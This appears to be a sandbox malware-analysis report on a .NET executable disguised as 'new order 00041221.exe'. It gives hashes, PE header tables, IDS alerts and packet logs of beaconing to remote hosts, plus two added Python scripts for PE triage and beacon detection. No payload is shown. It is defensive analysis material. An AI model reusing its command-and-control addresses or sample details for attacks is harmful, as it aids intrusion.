Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.862704704273304
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: new order 00041221.exe
File size: 740'864 bytes
MD5: f0c82f395d37fa87114ca7ef075695c8
SHA1: 06df165721ef1544251108d1af927786ea7de870
SHA256: d954045a10b2292df4e754ad6f1c5350c82ce0a75d2cd9275ada797eca2c413f
SHA512: 145f6655175992ee8d5526aea9e8dc281b243183a7c96fb170f63b620bcc39cbca7caa75672f02968deef34a5bc51bba4b82b89755145f0c5446cc63a5581430
SSDEEP: 12288:pTNYsbvttIEsckdcJvb0wSeIRT8d8OX4SOE0+N3bve6wJC+WrNnv0Y3S3yo3PeJW:tNYsbvttIRZm4SHHNZrNnvGyo3q
TLSH: 6BF4122D56AA9F57CB3D87B9F09220440774E029F283F75E5EC1E4E80E627D4C8976A3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..f.................D...........c... ........@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4b638e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x66A3037A [Fri Jul 26 02:01:30 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]   ; 0x402000 = ImageBase 0x400000 + IAT RVA 0x2000, the single import slot (mscoree.dll!_CorExeMain, see the import table below); this is the standard native entry stub of a .NET executable
add byte ptr [eax], al      ; repeated 97 times: the bytes following the 6-byte stub are zero padding, and 00 00 disassembles to this instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6334 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb4394 | 0xb4400 | f2c21709783cfecf3bab12beb0a753c9 | False | 0.9138281791782247 | data | 7.869956261157549 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x600 | 0x600 | 8cc51061b76e2ed9a4b6d2ac40a49596 | False | 0.4446614583333333 | data | 4.208815747903402 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0xc | 0x200 | 1ec507a80a6c9a0a331e6f4c2391e4c1 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xb8090 | 0x354 | data |  |  | 0.4460093896713615
RT_MANIFEST | 0xb83f4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
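The static facts tabulated above (link timestamp, DLL characteristics, data directories, per-section entropy, the jmp stub at the entry point and the lone mscoree.dll import) can be reproduced without a PE library. The following is an added example, not Joe Sandbox's code: a pure-Python PE32 parser that extracts those fields and computes section entropy. Because the sample itself is not on the page, build_sample_pe() constructs a small non-executable image with the same layout (IAT at RVA 0x2000, CLR header at 0x2008, an FF 25 jmp through the IAT, a high-entropy .text payload, the report's TimeDateStamp 0x66A3037A); that image and its contents are assumptions made for testing, not the real file.

```python
"""Pure-Python PE32 triage: header fields, per-section entropy, CLR header and
entry-point stub, i.e. the facts the static tables above report. Added example,
not Joe Sandbox code; build_sample_pe() constructs a non-executable test image
(an assumption, not the real sample) that copies this sample's layout."""
import math
import random
import struct
from datetime import datetime, timezone

DLL_CHARS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
             0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x1000: "APPCONTAINER",
             0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
IAT_DIR, CLR_DIR = 12, 14  # data directory indices: IAT and COM_DESCRIPTOR (CLR header)


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte, the same 8-bit entropy the report tabulates."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts if c)


def pe_triage(data: bytes) -> dict:
    """Parse a PE32 image and return what a first-pass triage wants to know."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsect, tstamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24  # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    dirs += [(0, 0)] * (16 - len(dirs))  # images may declare fewer than 16 directories
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rsize": rsize, "rptr": rptr,
                         "entropy": round(shannon_entropy(data[rptr:rptr + rsize]), 4)})
    # Map the entry point to its section and decode an FF 25 imm32 'jmp dword ptr [abs]'
    # stub; a .NET exe jumps through the IAT slot that holds mscoree!_CorExeMain.
    entry_sec = next((s for s in sections
                      if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rsize"])), None)
    jmp_target = None
    if entry_sec is not None:
        stub = data[entry_sec["rptr"] + (entry_rva - entry_sec["va"]):][:6]
        if len(stub) == 6 and stub[:2] == b"\xff\x25":
            jmp_target = struct.unpack_from("<I", stub, 2)[0]
    iat_rva, iat_size = dirs[IAT_DIR]
    clr_rva, clr_size = dirs[CLR_DIR]
    return {
        "timestamp_utc": datetime.fromtimestamp(tstamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "entry_rva": entry_rva,
        "entry_section": entry_sec["name"] if entry_sec else None,
        "jmp_target": jmp_target,
        "entry_jumps_into_iat": jmp_target is not None
                                and iat_rva <= jmp_target - image_base < iat_rva + iat_size,
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARS.items()) if dll_chars & bit],
        "high_entropy_sections": [s["name"] for s in sections if s["entropy"] > 7.0],
        "sections": sections,
    }


def build_sample_pe() -> bytes:
    """Constructed test image (assumption: not a real binary). Mirrors the report's
    layout: IAT at RVA 0x2000, CLR header at 0x2008, entry stub jmp [0x402000] at
    RVA 0x2050 followed by a high-entropy blob, plus a near-empty .rsrc section."""
    rng = random.Random(1234)
    blob = bytes(rng.getrandbits(8) for _ in range(0x1000 - 0x56))
    text = b"\0" * 8 + b"\0" * 0x48 + b"\xff\x25" + struct.pack("<I", 0x402000) + blob
    rsrc = b"\0" * 0x1F0 + b"ABCD" * 4
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x66A3037A, 0, 0, 0xE0, 0x0102)
    dirs = [(0, 0)] * 16
    dirs[IAT_DIR], dirs[CLR_DIR] = (0x2000, 8), (0x2008, 0x48)
    opt = (struct.pack("<HBB" + "I" * 9, 0x10B, 48, 0, len(text), len(rsrc), 0,
                       0x2050, 0x2000, 0x3000, 0x400000, 0x1000, 0x200)
           + struct.pack("<6H4I2H", 4, 0, 0, 0, 4, 0, 0, 0x4000, 0x200, 0, 2, 0x8540)
           + struct.pack("<6I", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
           + b"".join(struct.pack("<II", *d) for d in dirs))
    hdrs = (struct.pack("<8s6I2HI", b".text", len(text), 0x2000, len(text), 0x200,
                        0, 0, 0, 0, 0x60000020)
            + struct.pack("<8s6I2HI", b".rsrc", len(rsrc), 0x3000, len(rsrc), 0x1200,
                          0, 0, 0, 0, 0x40000040))
    return (dos + b"PE\0\0" + coff + opt + hdrs).ljust(0x200, b"\0") + text + rsrc
```

Call pe_triage(open(path, "rb").read()) on a real PE32 to get the same dictionary. A code section whose entropy sits near 7.9 next to a single native import is the usual shape of a .NET loader whose real payload is stored encrypted or compressed; entry_jumps_into_iat confirms the entry stub is the ordinary CLR bootstrap rather than native code of its own.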
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T09:03:24.118819+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49720 | 443 | 192.168.2.7 | 188.114.97.3
2024-07-26T09:03:09.919075+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49706 | 443 | 192.168.2.7 | 188.114.97.3
2024-07-26T09:03:45.702091+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 55797 | 40.127.169.103 | 192.168.2.7
2024-07-26T09:03:10.643717+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49707 | 80 | 192.168.2.7 | 193.122.6.168
2024-07-26T09:03:09.300053+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49702 | 80 | 192.168.2.7 | 193.122.6.168
2024-07-26T09:03:24.465395+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49717 | 52.165.165.26 | 192.168.2.7
2024-07-26T09:03:06.940575+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49702 | 80 | 192.168.2.7 | 193.122.6.168
2024-07-26T09:03:44.316920+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 55796 | 40.127.169.103 | 192.168.2.7
Note the direction of each alert: the three CVE-2016-2211 hits are on server-to-client traffic (source port 443) from 40.127.169.103 and 52.165.165.26, on connections separate from the sample's beaconing, whereas the Common Downloader Header Pattern alerts sit on the sample's own client-side connections to 193.122.6.168:80 and 188.114.97.3:443.
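The alert table and the packet list are easier to reason about as flows than as rows. The block below is an added example and not part of the report: it rebuilds each client-initiated connection from packet rows (one packet per connection, excerpted from the TCP table that follows), measures how often the sample opens a new connection to each endpoint, and tags every alert with the flow and the direction it fired on. LOCAL_IP is the analysis VM address from the tables, and the row layout "Mon DD, YYYY HH:MM:SS.fffffffff TZ src_port dst_port src_ip dst_ip" follows the table's column order.

```python
"""Rebuild client-initiated flows from a packet list, measure the beaconing
interval per destination and tie the IDS alerts to the flows they fired on.
Added example, not part of the report. PACKETS holds one packet per connection
excerpted from the TCP table below; ALERTS holds the rows of the alert table."""
from collections import defaultdict
from datetime import datetime
from statistics import median

LOCAL_IP = "192.168.2.7"  # the analysis VM, as in the report

PACKETS = """\
Jul 26, 2024 09:03:05.825613022 CEST 49702 80 192.168.2.7 193.122.6.168
Jul 26, 2024 09:03:06.955890894 CEST 49703 443 192.168.2.7 188.114.97.3
Jul 26, 2024 09:03:09.250452042 CEST 49706 443 192.168.2.7 188.114.97.3
Jul 26, 2024 09:03:09.924933910 CEST 49707 80 192.168.2.7 193.122.6.168
Jul 26, 2024 09:03:10.594641924 CEST 49709 443 192.168.2.7 188.114.97.3
Jul 26, 2024 09:03:11.222276926 CEST 49710 80 192.168.2.7 193.122.6.168
Jul 26, 2024 09:03:13.954924107 CEST 49711 80 192.168.2.7 193.122.6.168
Jul 26, 2024 09:03:16.069993019 CEST 49712 443 192.168.2.7 188.114.97.3
Jul 26, 2024 09:03:16.786812067 CEST 49713 80 192.168.2.7 193.122.6.168
Jul 26, 2024 09:03:19.048593044 CEST 49714 443 192.168.2.7 188.114.97.3
Jul 26, 2024 09:03:19.638541937 CEST 49715 80 192.168.2.7 193.122.6.168
Jul 26, 2024 09:03:22.179352999 CEST 49716 443 192.168.2.7 188.114.97.3
Jul 26, 2024 09:03:22.828885078 CEST 49718 80 192.168.2.7 193.122.6.168
Jul 26, 2024 09:03:23.483360052 CEST 49720 443 192.168.2.7 188.114.97.3
Jul 26, 2024 09:03:24.140444040 CEST 49722 80 192.168.2.7 193.122.6.168
Jul 26, 2024 09:03:26.359874010 CEST 49725 443 192.168.2.7 188.114.97.3
Jul 26, 2024 09:03:27.051434994 CEST 49726 443 192.168.2.7 149.154.167.220
"""

# (sid, signature, src_port, dst_port, src_ip, dst_ip), as listed in the alert table
ALERTS = [
    (2803305, "ETPRO MALWARE Common Downloader Header Pattern H", 49720, 443, "192.168.2.7", "188.114.97.3"),
    (2803305, "ETPRO MALWARE Common Downloader Header Pattern H", 49706, 443, "192.168.2.7", "188.114.97.3"),
    (2022930, "ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow", 443, 55797, "40.127.169.103", "192.168.2.7"),
    (2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 49707, 80, "192.168.2.7", "193.122.6.168"),
    (2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 49702, 80, "192.168.2.7", "193.122.6.168"),
    (2022930, "ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow", 443, 49717, "52.165.165.26", "192.168.2.7"),
    (2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 49702, 80, "192.168.2.7", "193.122.6.168"),
    (2022930, "ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow", 443, 55796, "40.127.169.103", "192.168.2.7"),
]


def parse_packets(text: str) -> list:
    """Parse 'Mon DD, YYYY HH:MM:SS.fffffffff TZ sport dport sip dip' rows; the
    nanosecond fraction is cut to microseconds, the most datetime can hold."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 9:
            continue  # blank or header line
        hms, frac = parts[3].split(".")
        ts = datetime.strptime(f"{parts[0]} {parts[1]} {parts[2]} {hms}.{frac[:6]}",
                               "%b %d, %Y %H:%M:%S.%f")
        rows.append({"ts": ts, "sport": int(parts[5]), "dport": int(parts[6]),
                     "sip": parts[7], "dip": parts[8]})
    return rows


def flow_key(sip, sport, dip, dport, local_ip=LOCAL_IP):
    """Canonical (remote_ip, remote_port, local_port) key for either packet direction."""
    return (dip, dport, sport) if sip == local_ip else (sip, sport, dport)


def build_flows(rows, local_ip=LOCAL_IP) -> dict:
    """Map each flow key to the timestamp of its earliest packet."""
    flows = {}
    for r in rows:
        key = flow_key(r["sip"], r["sport"], r["dip"], r["dport"], local_ip)
        flows[key] = min(flows.get(key, r["ts"]), r["ts"])
    return flows


def beacon_summary(flows) -> dict:
    """Per (remote_ip, remote_port): connection count and median gap between new
    connections. Many short connections at a steady gap are the beacon signature."""
    starts = defaultdict(list)
    for (ip, port, _local_port), ts in flows.items():
        starts[(ip, port)].append(ts)
    out = {}
    for dst, stamps in starts.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        out[dst] = {"connections": len(stamps),
                    "median_gap_s": round(median(gaps), 2) if gaps else None}
    return out


def correlate_alerts(alerts, flows, local_ip=LOCAL_IP) -> list:
    """Attach each alert to its flow and note the direction it fired on, so hits on
    inbound (server->client) traffic from unrelated endpoints can be set aside."""
    out = []
    for sid, sig, sport, dport, sip, dip in alerts:
        key = flow_key(sip, sport, dip, dport, local_ip)
        out.append({"sid": sid, "signature": sig,
                    "direction": "client->server" if sip == local_ip else "server->client",
                    "remote": f"{key[0]}:{key[1]}", "flow_seen": key in flows})
    return out
```

Running beacon_summary(build_flows(parse_packets(PACKETS))) on this excerpt shows both 193.122.6.168:80 and 188.114.97.3:443 receiving a new connection roughly every three seconds (eight connections each, median gap 2.83 s and 2.88 s), which is the behaviour to carry into a network detection; correlate_alerts resolves the three CVE-2016-2211 alerts to server-to-client traffic on connections that are not among the sample's own flows.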
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2024 09:03:05.825613022 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:05.831568956 CEST | 80 | 49702 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:05.831721067 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:05.832084894 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:05.837492943 CEST | 80 | 49702 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:06.531081915 CEST | 80 | 49702 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:06.535823107 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:06.540728092 CEST | 80 | 49702 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:06.891879082 CEST | 80 | 49702 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:06.940574884 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:06.955890894 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:06.955939054 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:06.956557035 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:06.963951111 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:06.963975906 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:07.438919067 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:07.439071894 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:07.444463015 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:07.444472075 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:07.444812059 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:07.487534046 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:07.505680084 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:07.548540115 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:07.960217953 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:07.960319042 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:07.960413933 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:07.969619036 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:07.992885113 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:07.998681068 CEST | 80 | 49702 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:09.247378111 CEST | 80 | 49702 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:09.250452042 CEST | 49706 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:09.250489950 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:09.250610113 CEST | 49706 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:09.250868082 CEST | 49706 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:09.250881910 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:09.300052881 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:09.761877060 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:09.774473906 CEST | 49706 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:09.774568081 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:09.919105053 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:09.919323921 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:09.919392109 CEST | 49706 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:09.919786930 CEST | 49706 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:09.923782110 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:09.924933910 CEST | 49707 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:09.929918051 CEST | 80 | 49707 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:09.930032969 CEST | 49707 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:09.930144072 CEST | 49707 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:09.930629015 CEST | 80 | 49702 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:09.930855036 CEST | 49702 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:09.934993029 CEST | 80 | 49707 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:10.593067884 CEST | 80 | 49707 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:10.594641924 CEST | 49709 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:10.594716072 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:10.594796896 CEST | 49709 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:10.595124006 CEST | 49709 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:10.595141888 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:10.643717051 CEST | 49707 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:11.080826998 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:11.083190918 CEST | 49709 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:11.083239079 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:11.215873957 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:11.215966940 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:11.216449976 CEST | 49709 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:11.216864109 CEST | 49709 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:11.222276926 CEST | 49710 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:11.227142096 CEST | 80 | 49710 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:11.227317095 CEST | 49710 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:11.227489948 CEST | 49710 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:11.232238054 CEST | 80 | 49710 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:13.940898895 CEST | 80 | 49710 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:13.954924107 CEST | 49711 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:13.987483025 CEST | 49710 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:14.185848951 CEST | 80 | 49710 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:14.185941935 CEST | 49710 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:14.186134100 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:14.186222076 CEST | 49711 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:14.186454058 CEST | 49711 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:14.191287041 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:16.051285028 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:16.069993019 CEST | 49712 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:16.070053101 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:16.070143938 CEST | 49712 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:16.076559067 CEST | 49712 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:16.076590061 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:16.076704979 CEST | 49710 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:16.082537889 CEST | 80 | 49710 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:16.087300062 CEST | 49710 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:16.096885920 CEST | 49711 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:16.577074051 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:16.582406998 CEST | 49712 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:16.582432032 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:16.719886065 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:16.719976902 CEST | 443 | 49712 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:16.720025063 CEST | 49712 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:16.723089933 CEST | 49712 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:16.782828093 CEST | 49711 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:16.786812067 CEST | 49713 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:16.788384914 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:16.788434982 CEST | 49711 | 80 | 192.168.2.7 | 193.122.6.168
